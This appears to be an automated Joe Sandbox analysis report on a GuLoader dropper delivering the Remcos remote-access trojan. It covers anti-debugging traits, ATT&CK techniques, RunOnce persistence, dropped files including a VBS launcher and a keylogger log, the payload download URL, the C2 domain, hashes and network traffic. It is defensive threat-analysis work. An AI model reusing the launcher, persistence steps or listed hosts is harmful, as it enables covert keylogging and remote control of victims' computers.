Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02186663 LdrInitializeThunk,

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'

Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.16.dr	Binary or memory string: [ Program Manager ]
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery521	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pRcHGlVekw.exe	17%	ReversingLabs	Win32.Trojan.Fragtor
pRcHGlVekw.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe	17%	ReversingLabs	Win32.Trojan.Fragtor

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw	true	Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0	pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458794
Start date:	03.08.2021
Start time:	18:58:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 18s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	pRcHGlVekw.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@175/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.8% (good quality ratio 6.7%) Quality average: 12.9% Quality standard deviation: 24.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.88.21.125, 23.211.6.115, 168.61.161.212, 104.43.139.144, 23.211.4.86, 20.82.209.104, 40.112.88.60, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 20.190.160.134, 20.190.160.75, 20.190.160.8, 20.190.160.136, 20.190.160.4, 20.190.160.129, 20.190.160.132, 20.190.160.73, 93.184.220.29, 40.127.240.158, 51.104.136.2, 20.82.209.183 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/458794/sample/pRcHGlVekw.exe

Simulations

Behavior and APIs

Time	Type	Description
19:00:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs
19:00:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	JXblq0dqPN.exe	Get hash	malicious	Browse
	Fec9qUX4at.exe	Get hash	malicious	Browse
	LzbZ4T1iV8.exe	Get hash	malicious	Browse
	kGSHiWbgq9.exe	Get hash	malicious	Browse
	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	JXblq0dqPN.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_fkWglQyCXO188.bin
	Fec9qUX4at.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_fkWglQyCXO188.bin
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	JXblq0dqPN.exe	Get hash	malicious	Browse	194.5.97.128
	Fec9qUX4at.exe	Get hash	malicious	Browse	194.5.97.128
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	JXblq0dqPN.exe	Get hash	malicious	Browse	101.99.94.119
	Fec9qUX4at.exe	Get hash	malicious	Browse	101.99.94.119
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119
	Audio #Ud83d#Udcde lifewire.org.HTML	Get hash	malicious	Browse	111.90.141.176
	bitratencrypt.exe	Get hash	malicious	Browse	111.90.149.108
	svchost.exe	Get hash	malicious	Browse	111.90.149.108
	eVF243bmXC.exe	Get hash	malicious	Browse	111.90.149.108
	xSnF0lxFUX.exe	Get hash	malicious	Browse	111.90.146.149
	QppmM7JmZd.exe	Get hash	malicious	Browse	111.90.146.149
	vNiyRd4GcH.exe	Get hash	malicious	Browse	111.90.146.149
	4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe	Get hash	malicious	Browse	111.90.146.149
	SecuriteInfo.com.Trojan.Win32.Save.a.2038.exe	Get hash	malicious	Browse	101.99.94.204
	Minutes of Meeting 22062021.exe	Get hash	malicious	Browse	111.90.147.240
	naxpJ9fFZ4.exe	Get hash	malicious	Browse	111.90.149.115
	dMH1IIv1a1.exe	Get hash	malicious	Browse	111.90.149.115
	bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML	Get hash	malicious	Browse	111.90.140.91
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
DANILENKODE	jiYTQKf5gO.exe	Get hash	malicious	Browse	194.5.98.210
	JXblq0dqPN.exe	Get hash	malicious	Browse	194.5.97.128
	Global Wire Transfer.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	New Order PO#42617.exe	Get hash	malicious	Browse	194.5.98.7
	KITCOFiberOptics_CompanyCertifcate.exe	Get hash	malicious	Browse	194.5.98.210
	7keerHhHvn.exe	Get hash	malicious	Browse	194.5.98.74
	Purchase.exe	Get hash	malicious	Browse	194.5.97.150
	Fec9qUX4at.exe	Get hash	malicious	Browse	194.5.97.128
	Ordonnance PL-PB39-210706,pdf.exe	Get hash	malicious	Browse	194.5.98.7
	Tzcyxxestkakhuvtmvfdserywturrfjrye.exe	Get hash	malicious	Browse	194.5.98.72
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe Download File
Process:	C:\Users\user\Desktop\pRcHGlVekw.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.662154130313104
Encrypted:	false
SSDEEP:	1536:MfPqE74qa95aAmpcPTDo9flG6kPl9NIcGCp9bZYuQmiPY/peaja9QNE7YP:Mf5sR94AWc7Do3G60lM49eM/ptO9QeE
MD5:	D2CB32F7C7F384B4BAA8DD13D6B5BBAB
SHA1:	355ACB5AF5CAAEB59FD7C9E0A54B501C24D47919
SHA-256:	2BD846BDDA945DC48A21C9BDA1497FEB9E67DF8CFB024CC8669041490C7C9A90
SHA-512:	0D620354C0C94604A37277C2029832D4AFF586918821ED058F94FD0AB02817F7E9E48A4B53F221B0BB9617E9F5F349B0494E678694AC1D9053BB30F6B3766913
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...IG.T.................@..........D........P....@..................................q......................................TK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs Download File
Process:	C:\Users\user\Desktop\pRcHGlVekw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	5.104016732419952
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRDWXp5cViE2J5xAII1oyhgMHC:jFqhv9IWXp+N23fmhnC
MD5:	FCA010003BC83A3D0D5FA585F5B62900
SHA1:	2F0FEECD1CE61F34A74174844E09A5AA06FB748D
SHA-256:	C0329C71251FD21B5E0060D8AA0ADB702848B6B88EF451D33C1A72CF6532F4DC
SHA-512:	8FF45F3C8756EEC569C44DEB51D1F30D125C9735700EBE9885E7163884C350AC9C7C1F78BD930224F8E0FD45214F415CAEE0F55BA273C6500E9E31DF71DE1B10
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe")

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\pRcHGlVekw.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3396233491666556
Encrypted:	false
SSDEEP:	3:rklKlmuGlclNXWlfcl5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuGGafU5YcIeeDAlybW/G
MD5:	11433C9F76522D182E47B45E4AD5FD05
SHA1:	323674941D097ED5A15FBB6D3047240107922107
SHA-256:	21F21F6860F7D09D401BC84C2117167B91F15A8D22398893A6D189384764C157
SHA-512:	C157410A9FC604B8CB79B46006AADADCB0D2C55E955BB7E64A23C1C64B0DF0884FA68148313D63F669D1E0E3B6DA49A2ECD611775EACD122B0D81897D5B2AF25
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.3. .1.9.:.0.0.:.3.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.662154130313104
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pRcHGlVekw.exe
File size:	114688
MD5:	d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:	355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:	2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
SHA512:	0d620354c0c94604a37277c2029832d4aff586918821ed058f94fd0ab02817f7e9e48a4b53f221b0bb9617e9f5f349b0494e678694ac1d9053bb30f6b3766913
SSDEEP:	1536:MfPqE74qa95aAmpcPTDo9flG6kPl9NIcGCp9bZYuQmiPY/peaja9QNE7YP:Mf5sR94AWc7Do3G60lM49eM/ptO9QeE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...IG.T.................@..........D........P....@................

File Icon


Icon Hash:	6a4a266a2a3a2a2a

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x54A54749 [Thu Jan 1 13:10:33 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B3Ch
call 00007F4E1CCD0115h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi-0Ah], bl
dec ecx
neg byte ptr [edi+ebx*2+16A34338h]
fisttp qword ptr [esi-28D14792h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 53h
push esp
inc ebp
dec esi
push esp
dec edi
push edx
push ebx
push esp
inc ebp
dec ebp
dec ebp
inc ebp
push edx
dec esi
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
rcr byte ptr [ecx+03h], 00000000h
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
pop es
dec edx
or byte ptr [eax], ah
std
out 3Ah, al
inc edi
xchg byte ptr [edx+6Bh], bh
out dx, eax
in al, dx
inc esp
je 00007F4E1CCD0111h
pop edi
scasb
add byte ptr [ebp-57B79F5Ch], bh
lodsd
je 00007F4E1CCD015Ah
and esi, esp
push es
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc esi
pop ecx
add byte ptr [eax], al
pop eax
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [esi+45h], al
push esp
dec ecx
push ebx
dec eax
dec ecx
push ebx
inc ebp
add byte ptr [00000001h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b54	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b8e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13dd4	0x14000	False	0.651550292969	data	7.08042704515	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b8e	0x6000	False	0.545694986979	data	6.03858270221	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bce6	0xea8	data
RT_ICON	0x1b43e	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3641116991, next used block 3644398388
RT_ICON	0x1aed6	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x1892e	0x25a8	data
RT_ICON	0x17886	0x10a8	data
RT_ICON	0x1741e	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173c4	0x5a	data
RT_VERSION	0x171e0	0x1e4	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	LIEGEMAN
FileVersion	1.00
OriginalFilename	LIEGEMAN.exe
ProductName	KORPSENES

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 19:01:31.359549046 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.404753923 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.405019045 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.451824903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.451909065 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.500464916 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500549078 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500612020 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500654936 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.500718117 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.500751019 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.500755072 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.546262026 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546298027 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546320915 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546341896 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546359062 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546380997 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546401978 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546418905 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.546570063 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.546623945 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.546628952 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.591965914 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592009068 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592027903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592047930 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592072010 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592093945 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592122078 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592144966 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592169046 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592191935 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592216015 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592238903 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592262983 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592286110 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592313051 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592336893 CEST	80	49736	101.99.94.119	192.168.2.3
Aug 3, 2021 19:01:31.592360020 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.592447042 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:01:31.638211966 CEST	80	49736	101.99.94.119	192.168.2.3
